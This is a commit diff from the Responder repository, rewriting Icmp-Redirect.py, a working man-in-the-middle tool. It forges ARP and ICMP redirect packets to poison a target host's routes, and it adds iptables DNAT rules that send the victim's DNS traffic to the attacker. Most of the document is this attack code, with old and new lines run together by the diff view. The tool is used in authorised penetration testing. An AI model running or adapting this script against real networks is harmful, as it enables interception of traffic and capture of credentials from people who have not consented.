github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-19 13:00:00 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Fixed Icmp-Redirect..

Browse source
This commit is contained in:
lgandx 2016-06-05 20:25:58 -05:00
commit df63c1fc13
1 changed files with 201 additions and 196 deletions
Download patch file Download diff file Expand all files Collapse all files

165
tools/Icmp-Redirect.py
View file

@ -1,6 +1,7 @@
#!/usr/bin/env python #! /usr/bin/env python
# This file is part of Responder # NBT-NS/LLMNR Responder
# Original work by Laurent Gaffie - Trustwave Holdings # Created by Laurent Gaffie
# Copyright (C) 2014 Trustwave Holdings, Inc.
# #
# This program is free software: you can redistribute it and/or modify # This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by # it under the terms of the GNU General Public License as published by
@ -14,57 +15,64 @@
# #
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import os import sys,socket,struct,optparse,random,pipes
import sys from socket import *
import socket sys.path.append('../')
import struct from odict import OrderedDict
import optparse
import random
import pipes
from random import randrange from random import randrange
from time import sleep from time import sleep
from subprocess import call from subprocess import call
from pipes import quote from pipes import quote
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..')) parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
sys.path.insert(0, BASEDIR) prog=sys.argv[0],
from odict import OrderedDict )
from packets import Packet parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
from utils import *
parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr")
parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1', prog=sys.argv[0],)
parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-g', '--gateway', action="store", help="The ip address of the original gateway ('route -n' will tell)", metavar="10.20.30.254",dest="OriginalGwAddr")
parser.add_option('-t', '--target', action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
parser.add_option('-r', '--route', action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
parser.add_option('-s', '--secondaryroute', action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
parser.add_option('-a', '--alternate', action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
options, args = parser.parse_args() options, args = parser.parse_args()
def color(txt, code = 1, modifier = 0): if options.OURIP is None:
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) print "-i mandatory option is missing.\n"
parser.print_help()
exit(-1)
if options.OriginalGwAddr is None: if options.OriginalGwAddr is None:
print color("[!]", 1, 1), "-g mandatory option is missing, please provide the original gateway address.\n" print "-g mandatory option is missing, please provide the original gateway address.\n"
parser.print_help()
exit(-1) exit(-1)
if options.VictimIP is None: if options.VictimIP is None:
print color("[!]", 1, 1), "-t mandatory option is missing, please provide a target.\n" print "-t mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1) exit(-1)
if options.Interface is None: if options.Interface is None:
print color("[!]", 1, 1), "-I mandatory option is missing, please provide your network interface.\n" print "-I mandatory option is missing, please provide your network interface.\n"
parser.print_help()
exit(-1) exit(-1)
if options.ToThisHost is None: if options.ToThisHost is None:
print color("[!]", 1, 1), "r mandatory option is missing, please provide a destination target.\n" print "-r mandatory option is missing, please provide a destination target.\n"
parser.print_help()
exit(-1) exit(-1)
if options.AlternateGwAddr is None: if options.AlternateGwAddr is None:
AlternateGwAddr = FindLocalIP(Interface) AlternateGwAddr = options.OURIP
Responder_IP = FindLocalIP(Interface) #Setting some vars.
OURIP = options.OURIP
OriginalGwAddr = options.OriginalGwAddr OriginalGwAddr = options.OriginalGwAddr
AlternateGwAddr = options.AlternateGwAddr AlternateGwAddr = options.AlternateGwAddr
VictimIP = options.VictimIP VictimIP = options.VictimIP
@ -72,22 +80,26 @@ ToThisHost = options.ToThisHost
ToThisHost2 = options.ToThisHost2 ToThisHost2 = options.ToThisHost2
Interface = options.Interface Interface = options.Interface
print '###########################################################################' def Show_Help(ExtraHelpData):
print '## ICMP REDIRECT UTILITY 0.1 ##' help = "\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to laurent.gaffie@gmail.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n"
print '## ##' help+= ExtraHelpData
print '## This utility combined with Responder is useful on Windows networks ##' print help
print '## Most Linux distributions discard by default ICMP Redirects. ##'
print '## ##' MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
print '## Note that if the target is Windows, the poisoning will only ##'
print '## last for 10mn, you can re-poison the target by launching this ##' class Packet():
print '## utility again. If you wish to respond to the traffic, for example ##' fields = OrderedDict([
print '## to DNS queries issued by the target, run these commands as root: ##' ("data", ""),
print '## ##' ])
print '## * iptables -A OUTPUT -p ICMP -j DROP ##' def __init__(self, **kw):
print '## * iptables -t nat -A PREROUTING -p udp --dst %s ##' % ToThisHost self.fields = OrderedDict(self.__class__.fields)
print '## --dport 53 -j DNAT --to-destination %s:53 ##' % Responder_IP for k,v in kw.items():
print '###########################################################################' if callable(v):
print '' self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
def GenCheckSum(data): def GenCheckSum(data):
s = 0 s = 0
@ -105,6 +117,7 @@ class EthARP(Packet):
("DstMac", "\xff\xff\xff\xff\xff\xff"), ("DstMac", "\xff\xff\xff\xff\xff\xff"),
("SrcMac", ""), ("SrcMac", ""),
("Type", "\x08\x06" ), #ARP ("Type", "\x08\x06" ), #ARP
]) ])
class ARPWhoHas(Packet): class ARPWhoHas(Packet):
@ -118,11 +131,12 @@ class ARPWhoHas(Packet):
("SenderIP", "\x00\xff\x53\x4d"), ("SenderIP", "\x00\xff\x53\x4d"),
("DstMac", "\x00\x00\x00\x00\x00\x00"), ("DstMac", "\x00\x00\x00\x00\x00\x00"),
("DstIP", "\x00\x00\x00\x00"), ("DstIP", "\x00\x00\x00\x00"),
]) ])
def calculate(self): def calculate(self):
self.fields["DstIP"] = inet_aton(self.fields["DstIP"]) self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
self.fields["SenderIP"] = inet_aton(Responder_IP) self.fields["SenderIP"] = inet_aton(OURIP)
##################################################################### #####################################################################
#ICMP Redirect Packets #ICMP Redirect Packets
@ -132,6 +146,7 @@ class Eth2(Packet):
("DstMac", ""), ("DstMac", ""),
("SrcMac", ""), ("SrcMac", ""),
("Type", "\x08\x00" ), #IP ("Type", "\x08\x00" ), #IP
]) ])
class IPPacket(Packet): class IPPacket(Packet):
@ -169,11 +184,12 @@ class ICMPRedir(Packet):
("CheckSum", "\x00\x00"), ("CheckSum", "\x00\x00"),
("GwAddr", ""), ("GwAddr", ""),
("Data", ""), ("Data", ""),
]) ])
def calculate(self): def calculate(self):
#Set the values #Set the values
self.fields["GwAddr"] = inet_aton(Responder_IP) self.fields["GwAddr"] = inet_aton(OURIP)
# Then CheckSum this packet # Then CheckSum this packet
CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"]) CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc) self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
@ -204,59 +220,48 @@ def ReceiveArpFrame(DstAddr):
PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)]) PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
return PrintMac,DstMac return PrintMac,DstMac
except: except:
print "[ARP]%s took too long to Respond. Please provide a valid host.\n"% DstAddr print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
exit(1) exit(1)
def IcmpRedirectSock(DestinationIP): def IcmpRedirectSock(DestinationIP):
PrintMac,DestMac = ReceiveArpFrame(VictimIP) PrintMac,DestMac = ReceiveArpFrame(VictimIP)
print '[ARP]Target Mac address is :',PrintMac
PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr) PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
print '[ARP]Router Mac address is :',PrintMac
s = socket(AF_PACKET, SOCK_RAW) s = socket(AF_PACKET, SOCK_RAW)
s.bind((Interface, 0x0800)) Protocol = 0x0800
s.bind((Interface, Protocol))
Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac) Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP())) IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP()))
IPPackUDP.calculate() IPPackUDP.calculate()
ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP)) ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
ICMPPack.calculate() ICMPPack.calculate()
IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack)) IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
IPPack.calculate() IPPack.calculate()
final = str(Eth)+str(IPPack) final = str(Eth)+str(IPPack)
s.send(final) s.send(final)
print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
print text("[ICMP-Redir] %s should have been poisoned with a new route for target: %s" % (VictimIP, DestinationIP)) def FindWhatToDo(ToThisHost2):
if ToThisHost2 != None:
Show_Help('Hit CRTL-C to kill this script')
RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
if ToThisHost2 == None:
Show_Help(MoreHelp)
IcmpRedirectSock(DestinationIP=ToThisHost)
exit()
def RunThisInLoop(host, host2, ip): def RunThisInLoop(host, host2, ip):
dns1 = pipes.quote(host) dns1 = pipes.quote(host)
dns2 = pipes.quote(host2) dns2 = pipes.quote(host2)
Responder_IPadd = pipes.quote(ip) ouripadd = pipes.quote(ip)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
call("iptables -A OUTPUT -p ICMP -j DROP") call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
call("iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+Responder_IP+":53", shell=True) print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
call("iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+Responder_IP+":53", shell=True)
print text("[ICMP-Redir] Automatic mode enabled")
print text("[ICMP-Redir] IPtables rules added for both DNS Servers")
while True: while True:
print text("[ICMP-Redir] Poisoning target... Next round in 8 minutes.")
try:
IcmpRedirectSock(DestinationIP=dns1) IcmpRedirectSock(DestinationIP=dns1)
IcmpRedirectSock(DestinationIP=dns2) IcmpRedirectSock(DestinationIP=dns2)
print "[+]Repoisoning the target in 8 minutes..."
sleep(480) sleep(480)
except KeyboardInterrupt: FindWhatToDo(ToThisHost2)
sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
if __name__ == "__main__":
if ToThisHost2 is not None:
RunThisInLoop(ToThisHost, ToThisHost2,Responder_IP)
if ToThisHost2 is None:
print text("[ICMP-Redir] Poisoning target...")
IcmpRedirectSock(DestinationIP=ToThisHost)
print text("[ICMP-Redir] Done.")
exit()